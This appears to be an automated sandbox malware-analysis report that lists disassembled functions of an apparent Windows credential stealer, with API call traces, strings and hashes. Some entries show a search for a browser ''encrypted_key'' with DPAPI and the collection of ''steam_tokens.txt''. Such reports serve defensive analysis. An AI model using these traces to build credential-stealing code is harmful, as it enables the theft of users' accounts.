                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: e94cb93137da9eeff093c77f8a9cafd322e06a1334b4cfa84736929f3bf0b5ba
                                    • Instruction ID: 1d74c2aef894c86f4018ed68a997f89eaf8d82b91bcd4b0bf92926124f76791d
                                    • Opcode Fuzzy Hash: e94cb93137da9eeff093c77f8a9cafd322e06a1334b4cfa84736929f3bf0b5ba
                                    • Instruction Fuzzy Hash: FB01BC75600258AFE710DBE0AC59FBB7BBCEB49711F100098FE45D7241EA705A06C7A0
                                    Function 008E2820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E2835
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E283C
                                      • Part of subcall function 008E28B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E28C5
                                      • Part of subcall function 008E28B0: RtlAllocateHeap.NTDLL(00000000), ref: 008E28CC
                                      • Part of subcall function 008E28B0: RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008E2849), ref: 008E28EB
                                      • Part of subcall function 008E28B0: RegQueryValueExA.ADVAPI32(008E2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 008E2905
                                      • Part of subcall function 008E28B0: RegCloseKey.ADVAPI32(008E2849), ref: 008E290F
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008D9560), ref: 008E2871
                                    • RegQueryValueExA.ADVAPI32(008D9560,0053E208,00000000,00000000,00000000,000000FF), ref: 008E288C
                                    • RegCloseKey.ADVAPI32(008D9560), ref: 008E2896
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: bd7fda9e79eacccd0bcdb60478f449bd6be025b7ae34d0b7d1eb12961cd6c360
                                    • Instruction ID: ab75e4113115dc5c2be79b9dcd76224cc589e1963a718f979492728cfe4faea3
                                    • Opcode Fuzzy Hash: bd7fda9e79eacccd0bcdb60478f449bd6be025b7ae34d0b7d1eb12961cd6c360
                                    • Instruction Fuzzy Hash: D301AD75A40218BFEB14EBE4AC49FBB7B7CEB44315F004168FE08D2290EA749946C7A0
                                    Function 008C7130 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 008C717E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008C71B9
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C71C0
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008C7203
                                    • HeapFree.KERNEL32(00000000), ref: 008C720A
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008C7269
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: 586109656389e44427ccfa26d83876a9ee4524756f3eb6de15dbe2121437b19c
                                    • Instruction ID: 85d3e19ecee9dfdd1255e7ef6780efc6cad7b21b22d57f81d7c67a276d70696f
                                    • Opcode Fuzzy Hash: 586109656389e44427ccfa26d83876a9ee4524756f3eb6de15dbe2121437b19c
                                    • Instruction Fuzzy Hash: E6412A717056059BEB20CFA9D884BAAB3F8FB88315F1845ADE95AC7340E631E941CB50
                                    Function 008C9CD0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008C9D08
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008C9D3A
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008C9D63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: 2effe420c35e591b0d773d940c2938497945f36a05b635000529f3a6cf6394c1
                                    • Instruction ID: e5ced901c0932c60190176fef4f2b529f522aa01ddf5e5a2eb0aa8f85eda18c8
                                    • Opcode Fuzzy Hash: 2effe420c35e591b0d773d940c2938497945f36a05b635000529f3a6cf6394c1
                                    • Instruction Fuzzy Hash: C1416A71A006099BDB10EFA8C889FAE7BB4FF44301F0445ADEA95E7292DA30ED05C791
                                    Function 008DEB40 Relevance: 9.1, APIs: 6, Instructions: 113stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DEB8B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DEBC0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DEBCC
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DEBE3
                                    • lstrcat.KERNEL32(?,005390D8), ref: 008DEBF4
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DEC04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: d52cbce33825c6fd652e9b37f8e9e3bbaefa12ed18b6f28fff26a73504dbbb9a
                                    • Instruction ID: 9e5d52e88f1b1231570edc76259635db120c995e843002196be4ed47e0185865
                                    • Opcode Fuzzy Hash: d52cbce33825c6fd652e9b37f8e9e3bbaefa12ed18b6f28fff26a73504dbbb9a
                                    • Instruction Fuzzy Hash: FF415071614204AFC754EBB8DC45FAA77B4FF88310F408929BA99C7391DE34E9198B92
                                    Function 008DEE10 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DEE3F
                                    • lstrlen.KERNEL32(00000000), ref: 008DEE4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DEE74
                                    • lstrlen.KERNEL32(00000000), ref: 008DEE7B
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 008DEEAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 1b399e02210e6da8910593328d797e3ec9f536b3602daec7c563e711acbc9a16
                                    • Instruction ID: 76f691c5b2f63eec4c37144a2e5e49b5a73f06e22d5388a5be34e6981a0b3ce7
                                    • Opcode Fuzzy Hash: 1b399e02210e6da8910593328d797e3ec9f536b3602daec7c563e711acbc9a16
                                    • Instruction Fuzzy Hash: 12313631A11A555BC721BBBCD88AF6E7BB5FF40300F440629B844DB2A2DE34DD1A87D2
                                    Function 008C9AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008C12EE), ref: 008C9AFA
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008C12EE), ref: 008C9B10
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,008C12EE), ref: 008C9B27
                                    • ReadFile.KERNEL32(00000000,00000000,?,008C12EE,00000000,?,?,?,008C12EE), ref: 008C9B40
                                    • LocalFree.KERNEL32(?,?,?,?,008C12EE), ref: 008C9B60
                                    • CloseHandle.KERNEL32(00000000,?,?,?,008C12EE), ref: 008C9B67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 8a6df1edbdecfd7aaa87789fa0b2593ee74ff5aeeb6d6428ba5e35ab2ed63e39
                                    • Instruction ID: 2cfec507c83998df416265eda3573a7e7b386228c15a296b64a5a0ca33803989
                                    • Opcode Fuzzy Hash: 8a6df1edbdecfd7aaa87789fa0b2593ee74ff5aeeb6d6428ba5e35ab2ed63e39
                                    • Instruction Fuzzy Hash: AB11D67160021AAFE714DFA5EC88FBA777CEB04714F1041A9F915D6280EA34ED51CB65
                                    Function 008E5AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5B34
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 008E5B9C
                                    • memmove.MSVCRT(00000000,?,?), ref: 008E5BA9
                                    • memmove.MSVCRT(00000000,?,?), ref: 008E5BB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: 720299a0c850d40b800e3095cce77e2a9ec7a7c8b5bea8cf681c5365e5fad407
                                    • Instruction ID: a8d82416eb51752b6547b2e6c38980cbf931ce36cffc538b8e2da9b5ee65c948
                                    • Opcode Fuzzy Hash: 720299a0c850d40b800e3095cce77e2a9ec7a7c8b5bea8cf681c5365e5fad407
                                    • Instruction Fuzzy Hash: 3D416E75A005199FCF08DF6DC991AAEBBB5FB89714F148229E919E7384E730DD008B91
                                    Function 008D7DC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7DD8
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA205
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA22B
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7DF6
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: 59e51ff4b02ab2c49639d7700783515a2c32fb064b25b7d229033df4de3d2221
                                    • Instruction ID: 2ae043ad3cd09c600aa9f668d4e00cf3439789b5e0dbc3a699be2b8661da17b1
                                    • Opcode Fuzzy Hash: 59e51ff4b02ab2c49639d7700783515a2c32fb064b25b7d229033df4de3d2221
                                    • Instruction Fuzzy Hash: BE2171323086448BD7249E6CD881A2AB7E5FF95B10F204B6FE596CB741E771EC4187A1
                                    Function 008DECD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DED14
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DED43
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DED51
                                    • lstrcat.KERNEL32(?,0053E460), ref: 008DED6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID: `S
                                    • API String ID: 818526691-3154622632
                                    • Opcode ID: 53fb109599de3e0165b30b043b564bff7f3f4e955ca147651b24a568df3c0acc
                                    • Instruction ID: e2ae2a02f729dbfdad167f62a2fc9e9b3cabc823e4a4e76e980e8ce83fdef44a
                                    • Opcode Fuzzy Hash: 53fb109599de3e0165b30b043b564bff7f3f4e955ca147651b24a568df3c0acc
                                    • Instruction Fuzzy Hash: 6F317C71A10118ABCB10EBB8DC45FEE77B8FB88300F0001A9BA45D7391DE70EE498B95
                                    Function 008E3360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E338F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E3396
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 008E33B1
                                    • wsprintfA.USER32 ref: 008E33D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
